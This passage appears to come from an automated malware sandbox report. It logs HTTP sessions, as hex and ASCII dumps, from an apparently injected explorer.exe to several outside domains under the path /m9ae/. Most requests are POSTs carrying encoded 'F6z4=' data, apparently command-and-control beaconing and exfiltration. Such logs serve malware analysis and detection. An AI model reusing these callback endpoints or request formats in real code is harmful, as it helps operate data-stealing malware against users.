                                                                                                                        Nov 29, 2022 10:34:37.611294031 CET212INData Raw: 34 20 23 63 6f 6e 74 65 6e 74 20 23 61 63 63 6f 72 64 69 6f 6e 20 70 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 20 39 35 25 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 6c 65 66 74 3b 7d 0a 20 20 20 20 20 20 20 20 23 63 6f 6e 74 61 69 6e 65 72 20 23 6d 69
                                                                                                                        Data Ascii: 4 #content #accordion p {font-size: 95%; text-align: left;} #container #mid404 #content #accordion h3 {font-weight: bold;} #container #mid404 #content #accordion h4 {font-weight: bold; font-style: italic; text-align: left;} .co
                                                                                                                        Nov 29, 2022 10:34:37.611318111 CET213INData Raw: 63 61 75 73 65 20 79 6f 75 20 68 61 76 65 20 48 6f 74 20 4c 69 6e 6b 20 50 72 6f 74 65 63 74 69 6f 6e 20 74 75 72 6e 65 64 20 6f 6e 20 61 6e 64 20 74 68 65 20 64 6f 6d 61 69 6e 20 69 73 20 6e 6f 74 20 6f 6e 20 74 68 65 20 6c 69 73 74 20 6f 66 20
                                                                                                                        Data Ascii: cause you have Hot Link Protection turned on and the domain is not on the list of authorized domains.</p><p>If you go to your temporary url (http://ip/~username/) and get this error, there maybe a problem with the rule set stored in
                                                                                                                        Nov 29, 2022 10:34:37.611341000 CET215INData Raw: 6e 67 3e 20 69 73 20 69 6d 70 6f 72 74 61 6e 74 20 69 6e 20 74 68 69 73 20 65 78 61 6d 70 6c 65 2e 20 4f 6e 20 70 6c 61 74 66 6f 72 6d 73 20 74 68 61 74 20 65 6e 66 6f 72 63 65 20 63 61 73 65 2d 73 65 6e 73 69 74 69 76 69 74 79 20 3c 73 74 72 6f
                                                                                                                        Data Ascii: ng> is important in this example. On platforms that enforce case-sensitivity <strong>e</strong>xample and <strong>E</strong>xample are not the same locations.</p><p>For addon domains, the file must be in public_html/addondomain.com/ex
                                                                                                                        Nov 29, 2022 10:34:37.611363888 CET216INData Raw: 6f 6e 73 2e 3c 2f 70 3e 0a 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 3c 64 69 76 20 69 64 3d 22 77 70 22 3e 0a 09 09 09 09 09 09 3c 68 33 3e 3c 61 20 63 6c 61 73 73 3d 22 65 78 70 61 6e 64
                                                                                                                        Data Ascii: ons.</p></div></div><div id="wp"><h3><a class="expander" href=#>404 Errors After Clicking WordPress Links</a></h3><div class="content"><p>When working with WordPress, 404 Page Not Found errors can
                                                                                                                        Nov 29, 2022 10:34:37.611397982 CET217INData Raw: 69 74 20 79 6f 75 72 20 2e 68 74 61 63 63 65 73 73 20 66 69 6c 65 20 64 69 72 65 63 74 6c 79 2e 3c 2f 70 3e 0a 09 09 09 09 09 09 09 09 3c 68 34 3e 3c 75 3e 4f 70 74 69 6f 6e 20 32 3a 20 4d 6f 64 69 66 79 20 74 68 65 20 2e 68 74 61 63 63 65 73 73
                                                                                                                        Data Ascii: it your .htaccess file directly.</p><h4><u>Option 2: Modify the .htaccess File</u></h4><p>Add the following snippet of code<em> </em>to the top of your .htaccess file:</p><div class="code"><p>#
                                                                                                                        Nov 29, 2022 10:34:37.611421108 CET218INData Raw: 72 79 20 63 6f 6d 6d 6f 6e 20 64 69 72 65 63 74 69 76 65 73 20 66 6f 75 6e 64 20 69 6e 20 61 20 2e 68 74 61 63 63 65 73 73 20 66 69 6c 65 2c 20 61 6e 64 20 6d 61 6e 79 20 73 63 72 69 70 74 73 20 73 75 63 68 20 61 73 20 57 6f 72 64 50 72 65 73 73
                                                                                                                        Data Ascii: ry common directives found in a .htaccess file, and many scripts such as WordPress, Drupal, Joomla and Magento add directives to the .htaccess so those scripts can function.</p><p>It is possible that you may need to edit the .htaccess
                                                                                                                        Nov 29, 2022 10:34:37.611489058 CET220INData Raw: 6e 61 67 65 72 3c 2f 73 74 72 6f 6e 67 3e 20 69 63 6f 6e 2e 3c 2f 6c 69 3e 0a 09 09 09 09 09 09 09 09 09 3c 6c 69 3e 43 68 65 63 6b 20 74 68 65 20 62 6f 78 20 66 6f 72 26 6e 62 73 70 3b 3c 73 74 72 6f 6e 67 3e 44 6f 63 75 6d 65 6e 74 20 52 6f 6f
                                                                                                                        Data Ascii: nager</strong> icon.</li><li>Check the box for&nbsp;<strong>Document Root for</strong> and select the domain name you wish to access from the drop-down menu.</li><li>Make sure&nbsp;<strong>Show Hidden Files (dotfiles)</stro
                                                                                                                        Nov 29, 2022 10:34:37.611512899 CET220INData Raw: 20 76 65 72 73 69 6f 6e 20 75 6e 74 69 6c 20 79 6f 75 72 20 73 69 74 65 20 77 6f 72 6b 73 20 61 67 61 69 6e 2e 3c 2f 6c 69 3e 0a 09 09 09 09 09 09 09 09 09 3c 6c 69 3e 4f 6e 63 65 20 63 6f 6d 70 6c 65 74 65 2c 20 79 6f 75 20 63 61 6e 20 63 6c 69
                                                                                                                        Data Ascii: version until your site works again.</li><li>Once complete, you can click&nbsp;<strong>Close</strong> to close the File Manager window.</li></ol></div></div></div></div> </div> <d


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                        30192.168.2.54974662.233.121.6180C:\Windows\explorer.exe
                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                        Nov 29, 2022 10:36:06.734752893 CET326OUTGET /m9ae/?F6z4=yeGgPnkUyrtnR7ayT+iAJkQi5P+hLqfzRu7/UIGlFriReHTN1+d7DIiWZVVmKJ4cvvB3dwEDWmLuBMYDpMvfxEUSQC8X9wPCmA==&mN6Hg=kRq8Chx0sXs4Nnu0 HTTP/1.1
                                                                                                                        Host: www.new-thinking.digital
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                                                        Data Ascii:
                                                                                                                        Nov 29, 2022 10:36:06.771914959 CET327INHTTP/1.1 404 Not Found
                                                                                                                        Date: Tue, 29 Nov 2022 09:36:06 GMT
                                                                                                                        Server: Apache
                                                                                                                        Last-Modified: Thu, 29 Oct 2020 17:44:48 GMT
                                                                                                                        ETag: "82a1a-f65-5b2d2d61e36a7"
                                                                                                                        Accept-Ranges: bytes
                                                                                                                        Content-Length: 3941
                                                                                                                        X-Frame-Options: DENY
                                                                                                                        Connection: close
                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 74 6d 6c 2c 20 62 6f 64 79 2c 20 23 70 61 72 74 6e 65 72 2c 20 69 66 72 61 6d 65 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 31 30 30 25 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 31 30 30 25 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 3a 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6f 75 74 6c 69 6e 65 3a 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 30 25 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 62 61 73 65 6c 69 6e 65 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 38 36 39 32 63 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 22 4c 75 63 69 64 61 20 53 61 6e 73 20 55 6e 69 63 6f 64 65 22 2c 22 4c 75 63 69 64 61 20 47 72 61 6e 64 65 22 2c 47 61 72 75 64 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 09 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 66 72 61 6d 65 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 09 6d 61 72 67 69 6e 3a 20 30 20 61 75 74 6f 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0d 0a 09 09 09 61 20 7b 0d 0a 09 09 09 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0d 0a 09 09 09 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 77 72 61 70 70 65 72 20 7b 0d 0a 09 09 09 20 20 20 20 6d 61 78 2d 77 69 64 74 68 3a 20 31 31 30 30 70 78 3b 0d 0a 09 09 09 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 65 6d 3b 0d 0a 09 09 09 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 61 75 74 6f 3b 0d 0a 09 09 09 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0d 0a 09 09 09 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 77 72 61 70 70 65 72 20 2e 6c 6f 67 6f 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                        Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <style type="text/css"> html, body, #partner, iframe { height:100%; width:100%; margin:0; padding:0; border:0; outline:0; font-size:100%; vertical-align:baseline; background:#f8692c; color: #fff; font-family: Arial, "Lucida Sans Unicode","Lucida Grande",Garuda,sans-serif; } body { overflow: hidden; } iframe { margin: 0 auto 0; }a { text-decoration: none;} .wrapper { max-width: 1100px; padding: 0 1em; margin: 0 auto; position: relative;} .wrapper .logo {
                                                                                                                        Nov 29, 2022 10:36:06.771943092 CET328INData Raw: 09 66 6c 6f 61 74 3a 20 6c 65 66 74 3b 0d 0a 09 09 09 7d 0d 0a 09 09 09 2e 77 72 61 70 70 65 72 20 2e 6c 6f 67 6f 20 69 6d 67 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 09 77 69 64 74 68 3a 20 35 30 76 77 3b 0d 0a 20 20 20 20 20 20 20 20 20
                                                                                                                        Data Ascii: float: left;}.wrapper .logo img { width: 50vw; max-width: 240px; margin: 1em 0;}.wrapper .nav {text-align: right;display: inline;float: right;margin: 1.6em
                                                                                                                        Nov 29, 2022 10:36:06.771962881 CET330INData Raw: 74 3d 22 4e 4f 57 22 20 6e 61 6d 65 3d 22 65 78 70 69 72 65 73 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 2c 20 61 6c 6c 22 20 6e 61 6d 65 3d 22 47 4f 4f 47 4c 45 42 4f
                                                                                                                        Data Ascii: t="NOW" name="expires"> <meta content="index, follow, all" name="GOOGLEBOT"> <meta content="index, follow, all" name="robots"> ... Following Meta-Tag fixes scaling-issues on mobile devices --> <meta content
                                                                                                                        Nov 29, 2022 10:36:06.771980047 CET330INData Raw: 27 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 27 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                        Data Ascii: '<script type="text/javascript" language="JavaScript"' + 'src="//sedoparking.com/frmpark/' + window.location.host + '/' + 'easyparkeddomains'


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                        31192.168.2.549747107.148.15.8180C:\Windows\explorer.exe
                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                        Nov 29, 2022 10:36:12.237135887 CET332OUTPOST /m9ae/ HTTP/1.1
                                                                                                                        Host: www.ybkos.link
                                                                                                                        Connection: close
                                                                                                                        Content-Length: 410
                                                                                                                        Cache-Control: no-cache
                                                                                                                        Origin: http://www.ybkos.link
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Accept: */*
                                                                                                                        Referer: http://www.ybkos.link/m9ae/
                                                                                                                        Accept-Language: en-US
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Data Raw: 46 36 7a 34 3d 34 5f 6f 38 6b 4b 51 79 39 66 50 72 74 4c 6f 50 44 47 6f 6a 79 52 78 56 28 38 5a 49 51 6c 28 6a 71 42 50 64 43 72 57 34 4d 38 7e 33 68 78 7a 72 50 56 78 31 30 61 4b 65 55 39 55 49 73 6d 6b 74 4a 66 63 50 42 55 30 72 32 52 69 72 42 67 5a 5f 5a 67 4c 70 36 66 31 41 51 41 7e 4e 70 6e 51 64 38 70 48 52 6c 6f 50 4e 4b 6e 78 49 63 5a 48 79 42 31 66 6a 78 56 31 43 6f 30 7a 44 46 55 66 51 58 32 67 7a 6c 30 33 5a 39 4e 42 62 33 65 64 67 4b 63 51 32 4b 4d 46 6c 4a 75 65 73 35 32 74 6e 36 48 28 4f 37 7a 73 64 54 63 6a 51 34 2d 64 46 6d 66 7a 78 74 72 63 6c 61 43 61 4d 79 43 4c 5f 70 70 39 56 42 52 72 46 49 56 6a 30 46 5f 73 76 68 4e 6b 7a 28 5a 4b 49 70 39 32 45 66 5a 35 43 75 38 6d 58 59 54 64 31 46 74 79 4d 34 67 63 48 45 32 50 78 28 48 35 51 6b 38 59 35 79 5f 62 6b 54 73 4e 43 58 72 75 34 56 6a 6e 6a 4e 6e 68 4e 5a 5f 52 78 45 43 54 6e 37 5f 63 66 72 38 31 42 78 69 63 70 79 4c 57 78 31 52 32 34 65 4f 63 2d 7a 4a 37 4b 7e 42 71 70 45 31 6c 7a 36 41 51 44 34 54 6a 79 58 5f 66 41 36 36 58 64 55 36 79 56 70 75 59 54 68 59 5a 50 43 6d 70 61 62 32 59 43 4f 67 53 38 77 33 45 56 64 35 59 44 46 5f 73 47 74 53 75 6b 78 75 73 4f 5a 77 28 4a 76 5a 69 4d 52 56 34 63 67 37 61 64 33 63 67 4f 55 73 54 78 72 67 29 2e 00 00 00 00 00 00 00 00
                                                                                                                        Data Ascii: F6z4=4_o8kKQy9fPrtLoPDGojyRxV(8ZIQl(jqBPdCrW4M8~3hxzrPVx10aKeU9UIsmktJfcPBU0r2RirBgZ_ZgLp6f1AQA~NpnQd8pHRloPNKnxIcZHyB1fjxV1Co0zDFUfQX2gzl03Z9NBb3edgKcQ2KMFlJues52tn6H(O7zsdTcjQ4-dFmfzxtrclaCaMyCL_pp9VBRrFIVj0F_svhNkz(ZKIp92EfZ5Cu8mXYTd1FtyM4gcHE2Px(H5Qk8Y5y_bkTsNCXru4VjnjNnhNZ_RxECTn7_cfr81BxicpyLWx1R24eOc-zJ7K~BqpE1lz6AQD4TjyX_fA66XdU6yVpuYThYZPCmpab2YCOgS8w3EVd5YDF_sGtSukxusOZw(JvZiMRV4cg7ad3cgOUsTxrg).
                                                                                                                        Nov 29, 2022 10:36:12.446057081 CET332INHTTP/1.1 404 Not Found
                                                                                                                        Server: nginx
                                                                                                                        Date: Tue, 29 Nov 2022 09:36:12 GMT
                                                                                                                        Content-Type: text/html
                                                                                                                        Content-Length: 146
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                        32192.168.2.549748107.148.15.8180C:\Windows\explorer.exe
                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                        Nov 29, 2022 10:36:14.467072964 CET333OUTPOST /m9ae/ HTTP/1.1
                                                                                                                        Host: www.ybkos.link
                                                                                                                        Connection: close
                                                                                                                        Content-Length: 186
                                                                                                                        Cache-Control: no-cache
                                                                                                                        Origin: http://www.ybkos.link
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Accept: */*
                                                                                                                        Referer: http://www.ybkos.link/m9ae/
                                                                                                                        Accept-Language: en-US
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Data Raw: 46 36 7a 34 3d 34 5f 6f 38 6b 4b 51 79 39 66 50 72 74 38 55 50 43 58 6f 6a 36 78 78 56 67 4d 5a 4f 51 6c 28 67 71 42 50 52 43 75 6d 6f 4e 4c 4b 33 68 6c 28 72 49 6e 4a 31 33 61 4b 64 41 74 55 4d 68 47 6b 34 4a 66 63 54 42 56 49 72 32 51 47 72 42 68 4a 5f 5a 52 4c 6f 39 66 31 4f 53 41 7e 4f 37 58 51 55 38 70 72 46 6c 73 48 4e 4b 6b 5a 49 64 6f 48 79 50 44 7a 6b 67 6c 31 35 6b 55 7a 49 50 30 66 63 58 32 67 4e 6c 30 32 43 39 4f 35 62 33 76 74 67 4b 2d 6f 31 41 4d 46 61 4b 75 66 48 6f 46 45 50 78 56 44 5f 36 44 4a 48 44 74 71 54 78 38 59 75 34 77 29 2e 00 00 00 00 00 00 00 00
                                                                                                                        Data Ascii: F6z4=4_o8kKQy9fPrt8UPCXoj6xxVgMZOQl(gqBPRCumoNLK3hl(rInJ13aKdAtUMhGk4JfcTBVIr2QGrBhJ_ZRLo9f1OSA~O7XQU8prFlsHNKkZIdoHyPDzkgl15kUzIP0fcX2gNl02C9O5b3vtgK-o1AMFaKufHoFEPxVD_6DJHDtqTx8Yu4w).
                                                                                                                        Nov 29, 2022 10:36:14.674563885 CET333INHTTP/1.1 404 Not Found
                                                                                                                        Server: nginx
                                                                                                                        Date: Tue, 29 Nov 2022 09:36:14 GMT
                                                                                                                        Content-Type: text/html
                                                                                                                        Content-Length: 146
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                        33192.168.2.549749107.148.15.8180C:\Windows\explorer.exe
                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                        Nov 29, 2022 10:36:16.701500893 CET334OUTGET /m9ae/?F6z4=19Acn/cRxsS2hMIvbksqz2Fo9/tvE3PmoTWmDY67F7eOm0DJL1plqZyOKvwSm3g2XK4MIkQK6hC8KTphNB2J9vZOQC2YpVwH6g==&mN6Hg=kRq8Chx0sXs4Nnu0 HTTP/1.1
                                                                                                                        Host: www.ybkos.link
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                                                        Data Ascii:
                                                                                                                        Nov 29, 2022 10:36:16.908967018 CET334INHTTP/1.1 404 Not Found
                                                                                                                        Server: nginx
                                                                                                                        Date: Tue, 29 Nov 2022 09:36:16 GMT
                                                                                                                        Content-Type: text/html
                                                                                                                        Content-Length: 146
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                        34192.168.2.54975038.163.214.16980C:\Windows\explorer.exe
                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                        Nov 29, 2022 10:36:24.008307934 CET336OUTPOST /m9ae/ HTTP/1.1
                                                                                                                        Host: www.bookmygennie.com
                                                                                                                        Connection: close
                                                                                                                        Content-Length: 410
                                                                                                                        Cache-Control: no-cache
                                                                                                                        Origin: http://www.bookmygennie.com
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Accept: */*
                                                                                                                        Referer: http://www.bookmygennie.com/m9ae/
                                                                                                                        Accept-Language: en-US
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Data Raw: 46 36 7a 34 3d 33 6b 46 45 59 4a 55 4b 4b 35 64 4f 47 4b 38 59 76 43 32 6e 4b 42 66 73 31 42 58 6e 39 65 7e 73 77 35 56 6c 7e 59 77 71 33 74 52 2d 59 43 46 75 69 71 75 61 54 70 37 47 4b 74 53 58 41 6e 51 69 44 6e 7a 49 72 70 4a 76 73 30 76 72 4c 2d 34 71 4e 67 6b 30 63 77 72 50 57 33 7e 5a 46 59 65 4b 57 5f 30 58 4c 58 72 71 44 54 59 63 32 77 7e 47 41 31 73 45 55 59 34 61 4b 69 41 33 66 4b 36 59 54 4e 7a 6d 37 34 59 4b 36 4f 36 53 51 62 68 6e 36 32 44 69 34 4a 38 4b 59 78 6f 46 49 65 28 39 53 65 5a 4a 68 4f 46 41 51 71 49 39 56 77 45 79 74 49 42 46 7a 45 73 6e 31 6e 51 6b 6d 43 72 48 43 66 6f 39 59 64 48 54 46 5f 65 65 68 7a 4a 65 77 48 7e 35 4e 78 50 31 63 6c 69 74 41 76 70 47 49 69 79 50 58 37 41 41 79 33 7e 35 59 44 54 52 4d 67 7e 57 6c 46 72 51 5a 41 31 55 68 77 6e 4c 37 6b 4a 68 63 6a 52 36 39 63 31 4d 63 39 77 55 55 48 34 62 6a 4a 52 43 46 39 28 45 57 78 7e 50 74 59 41 6b 28 39 78 64 58 76 38 4b 39 66 28 5f 7a 76 6f 42 4b 47 41 59 56 2d 45 6a 54 76 30 30 4f 42 7a 4f 50 54 65 7a 67 4b 4c 5a 4a 30 67 61 4e 47 33 44 54 61 31 68 31 72 68 69 61 4c 6b 77 53 69 5a 45 41 4e 6e 35 73 4e 46 2d 54 64 56 57 44 30 57 66 4f 57 46 41 6e 5f 44 36 78 62 31 36 63 63 61 73 61 54 30 63 6c 71 4c 31 66 67 37 39 28 41 29 2e 00 00 00 00 00 00 00 00
                                                                                                                        Data Ascii: F6z4=3kFEYJUKK5dOGK8YvC2nKBfs1BXn9e~sw5Vl~Ywq3tR-YCFuiquaTp7GKtSXAnQiDnzIrpJvs0vrL-4qNgk0cwrPW3~ZFYeKW_0XLXrqDTYc2w~GA1sEUY4aKiA3fK6YTNzm74YK6O6SQbhn62Di4J8KYxoFIe(9SeZJhOFAQqI9VwEytIBFzEsn1nQkmCrHCfo9YdHTF_eehzJewH~5NxP1clitAvpGIiyPX7AAy3~5YDTRMg~WlFrQZA1UhwnL7kJhcjR69c1Mc9wUUH4bjJRCF9(EWx~PtYAk(9xdXv8K9f(_zvoBKGAYV-EjTv00OBzOPTezgKLZJ0gaNG3DTa1h1rhiaLkwSiZEANn5sNF-TdVWD0WfOWFAn_D6xb16ccasaT0clqL1fg79(A).
                                                                                                                        Nov 29, 2022 10:36:24.176883936 CET336INHTTP/1.1 404 Not Found
                                                                                                                        Server: nginx
                                                                                                                        Date: Tue, 29 Nov 2022 09:36:24 GMT
                                                                                                                        Content-Type: text/html
                                                                                                                        Content-Length: 146
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                        35192.168.2.54975138.163.214.16980C:\Windows\explorer.exe
                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                        Nov 29, 2022 10:36:26.209897995 CET337OUTPOST /m9ae/ HTTP/1.1
                                                                                                                        Host: www.bookmygennie.com
                                                                                                                        Connection: close
                                                                                                                        Content-Length: 186
                                                                                                                        Cache-Control: no-cache
                                                                                                                        Origin: http://www.bookmygennie.com
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Accept: */*
                                                                                                                        Referer: http://www.bookmygennie.com/m9ae/
                                                                                                                        Accept-Language: en-US
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Data Raw: 46 36 7a 34 3d 33 6b 46 45 59 4a 55 4b 4b 35 64 4f 47 39 41 59 73 7a 32 6e 41 68 66 73 39 68 58 68 39 65 7e 72 77 35 56 68 7e 5a 45 36 33 63 5a 2d 5a 53 56 75 68 66 43 61 55 70 37 46 53 64 54 51 45 6e 52 34 44 6e 7a 69 72 73 4a 76 73 30 37 72 4c 37 55 71 4e 52 6b 31 64 77 72 42 62 58 7e 61 42 59 65 6c 57 5f 34 44 4c 54 37 71 44 56 63 63 32 6e 69 47 44 6e 45 44 44 49 34 58 46 43 41 38 56 71 36 39 54 4e 79 33 37 34 59 73 36 4d 79 53 52 72 78 6e 34 55 62 68 68 5a 38 4c 53 52 70 6f 46 76 61 46 53 64 64 72 6e 73 6c 41 47 4a 35 5a 56 43 74 48 36 41 29 2e 00 00 00 00 00 00 00 00
